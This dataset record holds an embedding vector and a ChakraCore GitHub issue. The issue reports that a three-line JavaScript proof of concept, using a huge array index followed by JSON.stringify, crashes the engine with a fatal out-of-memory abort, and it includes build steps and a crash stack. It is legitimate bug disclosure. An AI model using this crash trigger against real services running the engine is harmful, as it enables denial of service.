0.0035675179678946733, -0.0006361273117363453, 0.0237994696944952, 0.003619569353759289, -0.01310091931372881, -0.027483101934194565, 0.008768646977841854, 0.02826787531375885, 0.015150940977036953, 0.015487272292375565, -0.009433302097022533, -0.01077062077820301, 0.01596774533390999, 0.028876475989818573, 0.004628564231097698, -0.02085256390273571, 0.03497849404811859, -0.012131963856518269, 0.00045695059816353023, 0.03965510427951813, -0.013052871450781822, -0.008624505251646042, 0.028668271377682686, 0.01073858980089426, 0.005293219815939665, -0.01616794429719448, -0.03629178926348686, -0.0036816305946558714, 0.01102687418460846, -0.011587426997721195, -0.00864052027463913, -0.027723338454961777, 0.006978882011026144, -0.020820531994104385, -0.026858486235141754, -0.016480252146720886, 0.02876436524093151, 0.009417287074029446, 0.015895675867795944, -0.01338119525462389, 0.011323166079819202, 0.012732556089758873, 0.009489357471466064, -0.02274242602288723, -0.023254932835698128, -0.014061866328120232, -0.017825577408075333, 0.02953312359750271, 0.0060739899054169655, -0.005709630437195301, -0.009457326494157314, 0.016023801639676094, -0.0005185113404877484, -0.01840214617550373, 0.014662458561360836, 0.012572398409247398, -0.008896773681044579, 0.009417287074029446, 0.0011491331970319152, 0.009785650297999382, 0.008744623512029648, 0.010009870864450932, 0.014310111291706562, 0.013933740556240082, -0.017665419727563858, 0.01473452989012003, -0.012860681861639023, -0.01827402040362358, -0.015287075191736221, -0.03047805465757847, -0.005529452580958605, -0.011851686984300613, -0.00695886230096221, -0.0007977866916917264, 0.015663446858525276, 0.017313072457909584, 0.010466321371495724, 0.00864052027463913, 0.03456208109855652, 0.010922770947217941, 0.0007752645178698003, 0.024103770032525063, 0.019891615957021713, -0.006210124120116234, -0.025080733001232147, -0.010290147736668587, -0.024712368845939636, 0.006942846346646547, -0.018674414604902267, -0.005913831759244204, 0.01563141494989395, -0.00923310499638319, -0.01246829517185688, 0.02066037431359291, -0.00019882105698343366, -0.0025144796818494797, 0.006786692421883345, -0.029244838282465935, 0.0015515299746766686, 0.009665531106293201, -0.004368307534605265, 0.014998790808022022, -0.0009524392080493271, 0.0059498674236238, -0.020019741728901863, -0.005373298656195402, 0.008880757726728916, 0.002818779554218054, 0.02951710671186447, 0.0019008745439350605, -0.030253833159804344, 0.007499395404011011, -0.005637559108436108, 0.011050897650420666, -0.0012872694060206413, 0.005533456802368164, -0.026057695969939232, 0.010554407723248005, -0.00835223589092493, -0.008188074454665184, -0.0016366138588637114, -0.003619569353759289, 0.008848725818097591, 0.01406987477093935, -0.01470249891281128, -0.004400339443236589, 0.019379111006855965, -0.0018007757607847452, 0.03827774524688721, -0.0027226849924772978, 0.013012832030653954, 0.009096970781683922, -0.0036455949302762747, 0.01344525907188654, -0.013597408309578896, 0.0005440365057438612, -0.009745609946548939, -0.0032111667096614838, 0.011090937070548534, -0.011675513349473476, -0.013741550967097282, -0.002114084782078862, 0.010001863352954388, -0.009593460708856583, 0.007771663833409548, 0.0032712258398532867, -0.005309235770255327, 0.01629607006907463, 0.02355923317372799, 0.03091048076748848, -0.01387768518179655, 0.026602232828736305, -0.01325306948274374, 0.004508445970714092, 0.023415090516209602, 0.00034734251676127315, 0.012484311126172543, -0.011034881696105003, 0.01347729004919529, 0.008232117630541325, 0.00478872237727046, 0.0026566197630017996, -0.00942529458552599, -0.007999888621270657, -0.013180998153984547, -0.01340521965175867, 0.03738086298108101, -0.008296181447803974, 0.013205021619796753, -0.0028408013749867678, -0.020115837454795837, 0.0060900053940713406, 0.021252958104014397, -0.03459411486983299, 0.008992868475615978, -0.02551315911114216, -0.00372167001478374, 0.0315190814435482, 0.0009819683618843555, -0.010386242531239986, -0.022037731483578682, -0.01616794429719448, -0.025929570198059082, 0.015223011374473572, 0.000744233897421509, -0.004908840637654066, 0.006794700399041176, -0.0033593126572668552, -0.0102420998737216, -0.0248244795948267, -0.010602455586194992, 0.008848725818097591, 0.002956915879622102, 0.02235804870724678, -0.03134290874004364, -0.003151107346639037, 0.0031230796594172716, -0.02115686424076557, 0.03597147390246391, -0.004372311756014824, -0.006666574161499739, -0.012532358057796955, 0.012396223843097687, -0.015030822716653347, -0.024968622252345085, -0.00778767978772521, 0.0006781687843613327, -0.014326127246022224, -0.03127884492278099, -0.0027647262904793024, -0.01966739445924759, 0.004452390596270561, -0.00942529458552599, -0.000017783160728868097, -0.005689610727131367, 0.0027887499891221523, -0.01977950520813465, 0.03542693704366684, 0.0011961795389652252, 0.02267836406826973, 0.006450360640883446, 0.012003837153315544, -0.011475316248834133, 0.01315697468817234, 0.0015995773719623685, -0.0011891726171597838, 0.012524350546300411, -0.015743525698781013, -0.008584464900195599, -0.000009055805094249081, -0.01237220037728548, -0.0012612437130883336, 0.006806712131947279, -0.002038009697571397, 0.0051210499368608, 0.0027407025918364525, 0.010097958147525787, 0.01212395541369915, 0.02600964903831482, -0.03129485994577408, -0.0042962366715073586, 0.022598285228013992, 0.022374063730239868, 0.007483379449695349, -0.013197014108300209, -0.0011601439910009503, 0.013509321957826614, 0.014270071871578693, -0.015559343621134758, -0.0017757511232048273, 0.002138108480721712, 0.00656647514551878, 0.011955790221691132, -0.00816805474460125, 0.0072431424632668495, -0.005589512176811695, -0.02807568572461605, -0.002684647450223565, -0.023190869018435478, 0.008192078210413456, 0.010578432120382786, 0.0066025108098983765, 0.00532124750316143, 0.002568532945588231, 0.00027251875144429505, -0.01551930420100689, -0.008087975904345512, 0.01523101981729269, -0.008376260288059711, 0.007763655856251717, -0.02695458009839058, 0.02676239050924778, 0.009657523594796658, 0.017697451636195183, 0.00444438261911273, 0.007271170150488615, -0.0024364024866372347, 0.0055094328708946705, 0.009465334005653858, -0.009153026156127453, 0.008128015324473381, 0.011018865741789341, 0.010258115828037262, -0.009209081530570984, -0.01130715012550354, -0.007415312342345715, 0.019827552139759064, 0.0034734252840280533, -0.003481433028355241, 0.02166936919093132, -0.020740453153848648, -0.025721363723278046, -0.0002825286064762622, 0.006622530519962311, -0.001953926868736744, 0.025929570198059082, 0.002500465838238597, -0.021268973127007484, 0.00844833068549633, 0.02317485399544239, -0.0007292191148735583, 0.014486284926533699, 0.0002243462367914617, -0.003695644438266754, -0.015319106169044971, 0.017056820914149284, -0.00832020491361618, -0.008800678886473179, 0.011171015910804272, 0.0012302130926400423, 0.010698550380766392, -0.0072991978377103806, 0.01758534088730812, -0.02072443626821041, 0.014854648150503635, 0.0009439308196306229, -0.010818668641149998, 0.00960947573184967, -0.010922770947217941, 0.0009439308196306229, 0.004936868324875832, 0.009064938873052597, -0.006590499076992273, 0.0006566475494764745, -0.012636461295187473, 0.011195039376616478, -0.00772762019187212, 0.00355550623498857, 0.004320260137319565, -0.01904277876019478, -0.008003892377018929, -0.024968622252345085, -0.030077660456299782, 0.0005355281173251569, -0.0022862544283270836, 0.023335011675953865, -0.009593460708856583, -0.00970557052642107, 0.004728663247078657, 0.015223011374473572, -0.02046818472445011, -0.019923647865653038, -0.004076019395142794, -0.007271170150488615, 0.025593237951397896, -0.004084027372300625, -0.019299032166600227, -0.023655327036976814, 0.019955677911639214, 0.008095983415842056, -0.011819656006991863, 0.021317021921277046, -0.004324264358729124, -0.002080051228404045, 0.000010095893230754882, 0.02042013593018055, 0.009393262676894665, -0.005301227793097496, 0.016992757096886635, -0.00786775816231966, -0.009185058064758778, -0.0003303257399238646, 0.01739315129816532, -0.01224407460540533, 0.007791683543473482, -0.008536417968571186, -0.0024364024866372347, -0.020259978249669075, 0.00720710726454854, 0.003549500135704875, -0.0006176090682856739, -0.025929570198059082, -0.02500065416097641, -0.020628342404961586, 0.020083805546164513, -0.006061977706849575, 0.02544909529387951, -0.009809673763811588, 0.020452167838811874, 0.010666518472135067, -0.005821741186082363, 0.01607985608279705, 0.0014354154700413346, -0.018017766997218132, -0.001980953384190798, 0.011010858230292797, 0.006554463412612677, 0.0014324125368148088, -0.0044163549318909645, -0.022454142570495605, -0.014998790808022022, 0.029324917122721672, 0.00787977036088705, 0.0200998205691576, -0.015070862136781216, -0.022598285228013992, -0.006226139608770609, -0.018129877746105194, -0.004752686712890863, 0.006622530519962311, 0.030077660456299782, 0.009249120950698853, 0.005044974852353334, 0.013765574432909489, -0.013813622295856476, 0.024151816964149475, 0.01689666137099266, -0.007203103043138981, 0.008075963705778122, -0.017297057434916496, 0.005193121265619993, 0.0404558964073658, -0.008408291265368462, 0.023094775155186653, 0.010210067965090275, -0.009681547060608864, 0.017681436613202095, -0.01796972006559372, -0.005077006760984659, -0.0014584382297471166, -0.020676389336586, 0.002988947555422783, -0.00013388202933128923, -0.014061866328120232, 0.02306274324655533, 0.001164147979579866, -0.021252958104014397, -0.0007292191148735583, -0.003139095613732934, -0.0026446080300956964, -0.002372339367866516, 0.0065384479239583015, 0.0038337805308401585, 0.02564128488302231, 0.0001640367554500699, -0.0491364561021328, 0.010073933750391006, 0.005309235770255327, -0.004420359153300524, -0.00657848734408617, -0.014950742945075035, 0.029004601761698723, 0.00022397087013814598, 0.006290202960371971, -0.00488481717184186, 0.0017277037259191275, -0.01592770591378212, 0.0142940953373909, -0.010137997567653656, 0.011130976490676403, 0.007639533374458551, 0.0014574371743947268, 0.008688568137586117, 0.0035915416665375233, -0.012300129048526287, -0.003547498257830739, 0.0015535319689661264, -0.043178580701351166, 0.0006841747090220451, 0.0056816027499735355, -0.011299142614006996, 0.0033432969357818365, 0.0029449041467159986, -0.003191146766766906, 0.0020259979646652937, 0.00011648987128864974, -0.00791980978101492, -0.004928860347718, -0.020115837454795837, -0.005269195884466171, -0.019459189847111702, 0.0159517303109169, 0.010626479052007198, -0.02192562073469162, 0.022277968004345894, -0.007335233502089977, 0.007271170150488615, -0.003743691835552454, 0.0016916681779548526, 0.03158314526081085, -0.013549361377954483, -0.008140027523040771, 0.014646443538367748, -0.01111496053636074, -0.006870775483548641, 0.001048033474944532, -0.0015655438182875514, 0.02921280823647976, -0.027611227706074715, -0.008944820612668991, 0.0028988586273044348, -0.0008423306280747056, -0.014374175108969212, -0.0017226987984031439, 0.022261952981352806, 0.019507236778736115, -0.01623200625181198, -0.0032391941640526056, -0.010530384257435799, 0.0055094328708946705, 0.00772762019187212, 0.02940499782562256, 0.029324917122721672, 0.006314226426184177, 0.00811600312590599, 0.00540533009916544, -0.008200086653232574, -0.009393262676894665, -0.0074753714725375175, -0.00033908439218066633, -0.019331062212586403, -0.00856844987720251, 0.016752520576119423, -0.009809673763811588, 0.016039816662669182, 0.017873626202344894, 0.004592529032379389, -0.015271059237420559, 0.001175158889964223, -0.02568933367729187, -0.007411308586597443, 0.008496378548443317, 0.01354135386645794, 0.0061340490356087685, 0.004496434237807989, 0.017040804028511047, 0.00735124945640564, -0.015279066748917103, 0.01315697468817234, -0.00860848929733038, -0.0038237706758081913, 0.009793657809495926, 0.022213906049728394, -0.0071830833330750465, 0.005165093578398228, 0.00425619725137949, -0.015102893114089966, 0.005149077624082565, -0.01318900566548109, -0.005137065891176462, -0.006798704154789448, -0.016175951808691025, -0.03987932577729225, 0.009056931361556053, -0.02882842905819416, 0.017665419727563858, -0.0003571021370589733, 0.016416188329458237, -0.0202920101583004, -0.018626367673277855, -0.00030555130797438323, 0.023575248196721077, 0.008400283753871918, -0.024856511503458023, 0.0003996441082563251, -0.011299142614006996, 0.004308248404413462, 0.01764940470457077, -0.010578432120382786, 0.0054533774964511395, -0.012428255751729012, -0.00013200516696088016, -0.016111887991428375, -0.016864631325006485, 0.019507236778736115, 0.029917502775788307, 0.019875599071383476, 0.0027126751374453306, 0.022149842232465744, 0.0065424516797065735, -0.022886568680405617, 0.0017387146363034844, -0.014822617173194885, 0.021589290350675583, -0.012532358057796955, 0.00416010245680809, -0.00033182723564095795, 0.010474328882992268, -0.004816750064492226, -0.005085014272481203, -0.007058960851281881, 0.004816750064492226, 0.030926497653126717, 0.004696631338447332, 0.00618610018864274, -0.00948134995996952, 0.011203047819435596, -0.0012742566177621484, 0.00942529458552599, -0.005697618704289198, 0.00008007897122297436, 0.017873626202344894, -0.005573496222496033, 0.01202786061912775, 0.014406206086277962, 0.0062661790288984776, 0.007275174371898174, -0.0018498242134228349, 0.024536196142435074, -0.0016886652447283268, 0.0099538154900074, 0.00493286456912756, 0.013309124857187271, -0.008776654489338398, 0.02261430025100708, 0.015663446858525276, 0.00022422110487241298, -0.009393262676894665, 0.010025886818766594, -0.0005032462649978697, -0.008480362594127655, -0.014798593707382679, -0.025048701092600822, -0.004816750064492226, -0.016752520576119423, -0.0021581281907856464, -0.0022021715994924307, -0.003921867348253727, -0.01174758467823267, -0.01683259941637516, 0.014398198574781418, -0.007675569038838148, 0.019523251801729202, -0.02857217565178871, 0.01896269991993904, 0.013301116414368153, 0.027370991185307503, 0.014582379721105099, -0.002174143912270665, 0.007567462511360645, 0.009112986735999584, 0.00667458213865757, -0.0011931766057386994, -0.013036856427788734, -0.0016346119809895754, -0.00493286456912756, 0.01567145437002182, -0.002534499391913414, 0.011691529303789139, 0.0029208804480731487, 0.007767660077661276, 0.01827402040362358, -0.013325139880180359, -0.002954914001747966, 0.017505262047052383, 0.013429243117570877, 0.003753701690584421, -0.0011561401188373566, 0.011883718892931938, -0.006938842590898275, -0.004039983730763197, 0.008296181447803974, 0.03462614491581917, -0.0065985070541501045, 0.02958117052912712, 0.006974878255277872, 0.006510420236736536, 0.005413338076323271, 0.004456394352018833, -0.008928804658353329, -0.008136022835969925, 0.0014924717834219337, -0.004728663247078657, 0.0121880192309618, 0.02826787531375885, -0.004912844859063625, -0.02757919579744339, 0.00246643228456378, 0.02355923317372799, 0.012620445340871811, 0.013613424263894558, 0.02142913267016411, -0.02267836406826973, 0.0003933879197575152, -0.008208094164729118, 0.04615751653909683, -0.010001863352954388, -0.006742649246007204, 0.003489441005513072, -0.01790565811097622, 0.01796972006559372, 0.045773137360811234, -0.00005114418308949098, -0.008087975904345512, -0.004168110433965921, -0.012788611464202404, -0.015239027328789234, -0.03110267035663128, 0.029885470867156982, 0.0003075532731600106, 0.03347300738096237, -0.00379374111071229, 0.00067566626239568, -0.00043292692862451077, 0.00942529458552599, 0.007315213792026043, -0.0003678627545014024, 0.007339237257838249, 0.01904277876019478, -0.01808183081448078, 0.00270266504958272, 0.01795370504260063, -0.007026929408311844, 0.016688456758856773, 0.005253180395811796, -0.007034937385469675, 0.014966758899390697, -0.009000875987112522, -0.01328510046005249, -0.021349051967263222, -0.005052982829511166, -0.0045885248109698296, 0.026474107056856155, -0.01640017330646515, -0.0026666296180337667, -0.0039018476381897926, 0.014974767342209816, -0.004920852370560169, -0.016432203352451324, 0.006322234403342009, 0.0202279482036829, -0.011947781778872013, -0.002524489536881447, 0.010274131782352924, 0.015591374598443508, -0.0028047659434378147, -0.0017016780329868197, 0.0032612159848213196, -0.008031920529901981, 0.022438127547502518, 0.006746653001755476, -0.0030049632769078016, 0.011146992444992065, -0.0041200630366802216, -0.00913701020181179, 0.02304672636091709, 0.015407193452119827, -0.01184367947280407, 0.0004904836532659829, 0.0033933462109416723, -0.005693614482879639, 0.003537488402798772, 0.014590388163924217, -0.003267221851274371, 0.03296050429344177, 0.02581745944917202, -0.014550348743796349, -0.005889808293431997, 0.002140110358595848, -0.00383978639729321, 0.00815604254603386, -0.004308248404413462, -0.023511184379458427, 0.0016566336853429675, 0.011979813687503338, -0.0013653463684022427, -0.0010980828665196896, -0.0056215436197817326, -0.007058960851281881, 0.015719501301646233, 0.003191146766766906, 0.01872246339917183, -0.020564278587698936, -0.006562471389770508, 0.00540533009916544, 0.013549361377954483, 0.001743719563819468, -0.01777753047645092, 0.012516343034803867, -0.011667505837976933, -0.00434828782454133, -0.004592529032379389, -0.01362944021821022, -0.024904558435082436, -0.007371269166469574, 0.013180998153984547, -0.0075914859771728516, -0.0074593559838831425, 0.02807568572461605, 0.009072947315871716, -0.00866454467177391, 0.001048033474944532, -0.0031811369117349386, 0.020836547017097473, 0.019138872623443604, -0.008240126073360443, 0.022213906049728394, -0.012051885016262531, -0.0075154113583266735, 0.023575248196721077, -0.007939829491078854, -0.013469282537698746, -0.010762613266706467, -0.010626479052007198, -0.024760417640209198, 0.008272157050669193, -0.00826414953917265, 0.0022001697216182947, -0.03706054762005806, 0.007903793826699257, 0.009321192279458046, 0.012236066162586212, 0.01715291477739811, 0.017008772119879723, -0.010274131782352924, -0.010474328882992268, -0.005181109067052603, -0.01306087989360094, 0.005020951386541128, -0.015615398995578289, -0.015038830228149891, -0.008776654489338398, 0.0016226001316681504, 0.009032907895743847, -0.001371352351270616, 0.057945139706134796, 0.02764325961470604, 0.005145073868334293, -0.008280165493488312, -0.0006661569350399077, 0.018626367673277855, -0.001731707714498043, -0.020740453153848648, -0.020628342404961586, 0.01629607006907463, -0.00613805279135704, -0.025016669183969498, 0.031374938786029816, 0.0027727342676371336, -0.0040079522877931595, -0.004500437993556261, -0.018674414604902267, -0.007042945362627506, -0.005517440848052502, -0.013028847984969616, 0.010874724015593529, 0.010306162759661674, 0.018994731828570366, -0.004448386840522289, 0.014181985519826412, 0.014133937656879425, 0.015807587653398514, 0.013148966245353222, -0.00662653474137187, -0.03084641881287098, -0.009721586480736732, 0.0019719444680958986, 0.007795687299221754, 0.01670447178184986, 0.018674414604902267, 0.007863754406571388, -0.00388783379457891, 0.010234092362225056, 0.018322067335247993, -0.03856603056192398, -0.014005811884999275, 0.002756718546152115, -0.01902676187455654, 0.01897871494293213, -0.015687469393014908, 0.020500216633081436, -0.013413227163255215, -0.008480362594127655, 0.01338119525462389, -0.0016776543343439698, 0.012163994833827019, 0.02700262889266014, 0.0018568310188129544, 0.001872846856713295, -0.00948134995996952, -0.017921673133969307, -0.011787624098360538, 0.0143901901319623, -0.013781590387225151, -0.006025942508131266, -0.009497365914285183, -0.014246048405766487, 0.0018758497899398208, 0.0022001697216182947, -0.014878672547638416, -0.0029128724709153175, -0.0016956721665337682, 0.009201073087751865, -0.00952138938009739, 0.0022642328403890133, 0.016672441735863686, -0.0010074934689328074, 0.010626479052007198, -0.01644822023808956, -0.012131963856518269, -0.0060900053940713406, 0.02267836406826973, -0.006122037302702665, 0.0021100807934999466, 0.0011040887329727411, -0.014470269903540611, -0.01833808422088623, -0.017745498567819595, -0.003573523834347725, -0.008216101676225662, -0.01064249500632286, -0.02650613896548748, -0.0025385033804923296, -0.016608377918601036, -0.0030630205292254686, -0.002408375032246113, 0.013613424263894558, -0.00826414953917265, -0.00025162313249893486, -0.005117046181112528, -0.02123694308102131, -0.01640017330646515, 0.003989934455603361, 0.004604540765285492, -0.000557549821678549, -0.013341155834496021, -0.008280165493488312, 0.0050249551422894, 0.002047018613666296, 0.008240126073360443, -0.021220926195383072, -0.012868690304458141, -0.030830401927232742, -0.013140958733856678, -0.003663612762466073, 0.01227610558271408, 0.014342143200337887, -0.022326016798615456, 0.007002905942499638, 0.00783572718501091, -0.013957764022052288, 0.002708671148866415, 0.003685634583234787, 0.0059738908894360065, -0.006686593871563673, -0.02035607397556305, -0.009945807978510857, 0.026025664061307907, 0.0052171447314321995, 0.010458312928676605, 0.01093077939003706, 0.006730637047439814, 0.017168929800391197, 0.005845764651894569, 0.004688623361289501, -0.0065424516797065735, -0.007247146684676409, 0.0022161854431033134, 0.010065926238894463, -0.013317132368683815, 0.011411253362894058, 0.004684619605541229, 0.01344525907188654, 0.0056215436197817326, -0.0054453699849545956, -0.02632996439933777, 0.05413338169455528, 0.012003837153315544, -0.018001751974225044, 0.012684508226811886, 0.005317243281751871, -0.0122841140255332, -0.007419316563755274, -0.00811600312590599, -0.017793547362089157, 0.013861669227480888, 0.0027727342676371336, 0.02255023643374443, -0.003919865470379591, 0.0029629217460751534, -0.003515466582030058, 0.019491219893097878, 0.013925732113420963, -0.02789951302111149, 0.021012721583247185, 0.00767957279458642, -0.01357338484376669, -0.007607501931488514, -0.006466376595199108, 0.0029689278453588486, -0.005753673613071442, -0.007231130730360746, 0.003187143011018634, 0.00913701020181179, -0.009000875987112522, -0.004948880057781935, 0.013389203697443008, -0.012772595509886742, -0.00709900027140975, 0.004424362909048796, 0.007947837933897972, 0.001731707714498043, 0.012348176911473274, 0.0122841140255332, 0.018754493445158005, 0.009761625900864601, -0.021589290350675583, -0.027290912345051765, 0.015255043283104897, 0.01790565811097622, 0.0033553086686879396, -0.02343110553920269, -0.008552433922886848, 0.011579418554902077, 0.012900721281766891, 0.008128015324473381, -0.013909717090427876, 0.01909082569181919, -0.01820995658636093, -0.029180776327848434, 0.016432203352451324, 0.00951338093727827, -0.009937799535691738, 0.006978882011026144, -0.012940761633217335, -0.0010024885414168239, 0.0025184834375977516, -0.016111887991428375, 0.037733208388090134 ]
null
null
null
null
null
null
null
null
null
[ "chakra-core", "ChakraCore" ]
# commit c3ead3f8a6e0bb8e32e043adc091c68cba5935e9 # bug big JS object causes oom # build and run os: Ubuntu 22.04.2 LTS mem: 2G build: ./build.sh --debug --static -j=8 run: ./DebugBuild/Debug/ch poc.js Run 10 times, 10 crashes # POC ```JavaScript const v10 = [0]; v10[1836277064] = 0; JSON["stringify"](v10); ``` # Abort output ```bash # ./DebugBuild/Debug/ch poc.js # Aborted (core dumped) ``` # crash stack ```bash #0 DBG_DebugBreak () at /root/work/xxxx/ChakraCore_dir/ChakraCore/pal/src/arch/i386/debugbreak.S:18 #1 0x00005565345541e2 in DebugBreak () at /root/work/xxxx/ChakraCore_dir/ChakraCore/pal/src/debug/debug.cpp:408 #2 0x00005565330288a6 in ReportFatalException (context=0, exceptionCode=-2147024882, reasonCode=Fatal_OutOfMemory, scenario=10) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Exceptions/ReportError.cpp:20 #3 0x0000556533028d42 in RecyclerSingleAllocationLimit_unrecoverable_error () at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Exceptions/ReportError.cpp:151 #4 0x000055653317488f in Memory::Recycler::LargeAlloc<false> (this=0x5565363a1a48, heap=0x5565363a64a0, size=44070649568, attributes=Memory::WithBarrierBit) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.cpp:1380 #5 0x0000556532ecf90b in Memory::Recycler::RealAlloc<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, heap=0x5565363a64a0, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.inl:384 #6 0x0000556532ecf4ec in Memory::Recycler::AllocWithAttributesInlined<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.inl:108 #7 0x0000556532f793ad in Memory::Recycler::AllocZeroWithAttributesInlined<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.inl:229 #8 0x0000556532f79369 in Memory::Recycler::AllocZeroWithAttributes<(Memory::ObjectInfoBits)256, false> (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.h:1598 #9 0x0000556532f78e49 in Memory::Recycler::AllocZero (this=0x5565363a1a48, size=44070649568) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Memory/Recycler.h:1360 #10 0x0000556532f790ba in operator new<Memory::Recycler> (byteSize=8, alloc=0x5565363a1a48, AllocFunc=(char *(Memory::Recycler::*)(Memory::Recycler * const, size_t)) 0x556532f78e10 <Memory::Recycler::AllocZero(unsigned long)>, plusSize=44070649560) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/DataStructures/../Memory/Allocator.h:513 #11 0x000055653490d281 in Js::JSONStringifier::ReadArray (this=0x7ffe2d47abb8, arr=0x7f0b964a22a0, objectStack=0x7ffe2d47abe8) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSONStringifier.cpp:407 #12 0x000055653490bf6e in Js::JSONStringifier::ReadProperty (this=0x7ffe2d47abb8, key=0x7f0b964b1450, holder=0x0, prop=0x7f0b9647f360, value=0x7f0b964a22a0, --Type <RET> for more, q to quit, c to continue without paging-- 47abe8) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSONStringifier.cpp:877 #13 0x000055653490bac3 in Js::JSONStringifier::Stringify (scriptContext=0x5565363cf488, value=0x7f0b964a22a0, replacer=0x0, space=0x7f0b964b5020) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSONStringifier.cpp:196 #14 0x00005565348feaa1 in JSON::Stringify (function=0x7f0b96482600, callInfo=...) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JSON.cpp:141 #15 0x00005565340a56ee in amd64_CallFunction () at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100 #16 0x0000556533c73f7a in Js::JavascriptFunction::CallFunction<true> (function=0x7f0b96482600, entryPoint=0x5565348fdf00 <JSON::Stringify(Js::RecyclableObject*, Js::CallInfo, ...)>, args=..., useLargeArgCount=false) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/JavascriptFunction.cpp:1364 #17 0x00005565339d426f in Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, Js::AuxArray<unsigned int> const*) (this=0x7ffe2d47c170, playout=0x7f0b964fd4a5, function=0x7f0b96482600, flags=16, spreadIndices=0x0) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3973 #18 0x00005565339d3b29 in Js::InterpreterStackFrame::OP_ProfileCallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned>(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > __unaligned const __unaligned*, Js::RecyclableObject*, unsigned int, unsigned short, unsigned int, Js::AuxArray<unsigned int> const*) (this=0x7ffe2d47c170, playout=0x7f0b964fd4a5, function=0x7f0b96482600, flags=0, profileId=0, inlineCacheIndex=0, spreadIndices=0x0) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:4016 #19 0x000055653382ce16 in Js::InterpreterStackFrame::OP_ProfiledCallIWithICIndex<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > >(Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIWithICIndex<Js::LayoutSizePolicy<(Js::LayoutSize)0> > > const __unaligned*) (this=0x7ffe2d47c170, playout=0x7f0b964fd4a5) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/./Language/InterpreterStackFrame.h:520 #20 0x000055653381c43b in Js::InterpreterStackFrame::ProcessProfiled (this=0x7ffe2d47c170) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterHandler.inl:91 #21 0x000055653378731f in Js::InterpreterStackFrame::Process (this=0x7ffe2d47c170) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:3472 #22 0x0000556533784e11 in Js::InterpreterStackFrame::InterpreterHelper (function=0x7f0b964b66e0, args=..., returnAddress=0x7f0b960d0fa2, addressOfReturnAddress=0x7ffe2d47c728, asmJsReturn=0x0) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:2153 #23 0x0000556533783678 in Js::InterpreterStackFrame::InterpreterThunk (layout=0x7ffe2d47c740) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Language/InterpreterStackFrame.cpp:1833 #24 0x00007f0b960d0fa2 in ?? () #25 0x00007ffe2d47c750 in ?? () #26 0x00005565340a56ee in amd64_CallFunction () at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Runtime/Library/amd64/JavascriptFunctionA.S:100 ```
big JS object causes Abort call to block oom
https://api.github.com/repos/chakra-core/ChakraCore/issues/6972/comments
1
2024-03-25T07:46:19
2024-04-18T21:50:20Z
https://github.com/chakra-core/ChakraCore/issues/6972
2,205,106,529
6,972
false
This is a GitHub Issue repo:ChakraCore owner:chakra-core Title : big JS object causes Abort call to block oom Issue date: --- start body --- # commit c3ead3f8a6e0bb8e32e043adc091c68cba5935e9 # bug big JS object causes oom # build and run os: Ubuntu 22.04.2 LTS mem: 2G build: ./build.sh --debug --static -j=8 run: ./DebugBuild/Debug/ch poc.js Run 10 times, 10 crashes # POC ```JavaScript const v10 = [0]; v10[1836277064] = 0; JSON["stringify"](v10); ``` # Abort output ```bash # ./DebugBuild/Debug/ch poc.js # Aborted (core dumped) ``` # crash stack ```bash #0 DBG_DebugBreak () at /root/work/xxxx/ChakraCore_dir/ChakraCore/pal/src/arch/i386/debugbreak.S:18 #1 0x00005565345541e2 in DebugBreak () at /root/work/xxxx/ChakraCore_dir/ChakraCore/pal/src/debug/debug.cpp:408 #2 0x00005565330288a6 in ReportFatalException (context=0, exceptionCode=-2147024882, reasonCode=Fatal_OutOfMemory, scenario=10) at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Exceptions/ReportError.cpp:20 #3 0x0000556533028d42 in RecyclerSingleAllocationLimit_unrecoverable_error () at /root/work/xxxx/ChakraCore_dir/ChakraCore/lib/Common/Exceptions/ReportError.cpp:151 #4 0x000055653317488f in 